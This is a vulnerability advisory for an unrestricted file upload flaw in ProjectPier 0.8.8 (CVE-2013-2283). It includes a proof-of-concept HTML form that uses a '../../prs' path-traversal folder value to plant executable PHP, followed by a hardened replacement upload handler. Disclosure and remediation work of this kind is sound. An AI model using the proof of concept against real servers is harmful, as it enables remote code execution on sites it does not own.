Vulnerabilities Disclosure

Remote Inclusion in Project Pier v 0.8.8

Dognædis Ref.: DGS-SEC-12

CVE Ref: CVE-2013-2283

Release Date: 2013/03/01

Discover Credits: CodeV - Code Analyzer

Bulletin Author(s): RVenancio - CodeV Team

Contact: irt@dognaedis.com

Type: Remote File Inclusion

Level: Very High (Low/High/Critical)

CVSS: 4.9 (Av:N/AC:L/Au:S/C:C/I:P/A:P)

Vulnerable Application: Project Pier v 0.8.8

Overview:
ProjectPier is a free, open-source PHP application for managing tasks, projects and teams through an intuitive web interface. It must be downloaded and installed on your own web server. ProjectPier helps your organization communicate, collaborate and get things done. Its function is similar to commercial groupware/project management products, but it allows the freedom and scalability of self-hosting.

Scope:

File: /tools/upload_file.php
Vulnerable Argument(s): $_FILES["file"]["name"]

Code:
line 20: move_uploaded_file($_FILES["file"]["tmp_name"])

Proof(s) of Concept:
<html>
<body>

<form action="http://localhost/pp088/tools/upload_file.php" method="post"
enctype="multipart/form-data">
<input type="hidden" value="../../prs" name="folder">
<input type="hidden" value="-99" name="part">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

</body>
</html>

Description:
This vulnerability allows an attacker to upload unexpected content, for instance a PHP file, which will be executed when the uploaded file is subsequently requested from the web server.

Impact:
Generally, exploiting this kind of vulnerability may provide an attack vector for various kinds of attacks, such as:
- Code execution on the web server
- Code execution on the client
- Denial of Service

Resolution:
Files uploaded by users should not be validated on the basis of the POST request headers (the client-supplied filename and Content-Type), but on the basis of the file contents themselves.
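The following is an added example of an upload handler that applies this resolution; it is written for this bulletin and is not ProjectPier code. The storage path, the allow-list of types, the size limit and the handling of the "folder" parameter are assumptions chosen for illustration. The type is decided from the bytes on disk (finfo), the client filename is discarded in favour of a server-generated one, the destination is kept outside the web root, and the "folder" value is restricted to a single safe path segment.

```php
<?php
// Added example: a hardened upload handler written for this advisory.
// It is NOT ProjectPier code; the directory layout, the allowed types,
// the size limit and the folder handling are assumptions for illustration.

declare(strict_types=1);

// Store uploads outside the web root so nothing placed here can be served
// or executed by the web server directly (assumed path).
const UPLOAD_ROOT = '/var/projectpier-uploads';

// Allow-list keyed by the MIME type detected from the file CONTENT, mapped to
// the single extension the server will assign. The client-supplied filename
// and Content-Type header are never trusted.
const ALLOWED_TYPES = [
    'image/png'       => 'png',
    'image/jpeg'      => 'jpg',
    'application/pdf' => 'pdf',
    'text/plain'      => 'txt',
];

const MAX_BYTES = 5 * 1024 * 1024; // assumed limit

/**
 * Validate and store one uploaded file.
 * Returns the server-chosen relative path on success; throws on any failure.
 */
function store_upload(array $file, string $folder): string
{
    // 1. Check PHP's own upload status and that this really is an upload
    //    (is_uploaded_file rejects attempts to move arbitrary server files).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload received');
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 2. Identify the type from the bytes on disk, not from the request.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if ($detected === false || !isset(ALLOWED_TYPES[$detected])) {
        throw new RuntimeException('file type not permitted');
    }

    // 3. Neutralise the folder parameter: accept only a single safe path
    //    segment, so values containing "../" are rejected outright.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $folder)) {
        throw new RuntimeException('invalid folder name');
    }
    $dir = UPLOAD_ROOT . '/' . $folder;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }

    // 4. Discard the client filename entirely; name the file ourselves with
    //    a random token and the extension derived from the detected type.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$detected];
    $dest = $dir . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('failed to store upload');
    }
    // Make sure the stored copy is never executable.
    chmod($dest, 0640);

    return $folder . '/' . $name;
}

// Request handling (hypothetical entry point for the handler).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    try {
        $stored = store_upload($_FILES['file'], (string)($_POST['folder'] ?? ''));
        http_response_code(201);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Because the files live outside the document root, they are later served through a download script that sets Content-Disposition: attachment and X-Content-Type-Options: nosniff, so the server never interprets an uploaded file as a script even if the content check is ever bypassed.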

Official Solution:
At the moment, there is no official solution for the reported vulnerabilities.

External References:
https://www.owasp.org/index.php/PHP_File_Inclusion
http://en.wikipedia.org/wiki/Remote_file_inclusion


© Copyright 2015 CodeV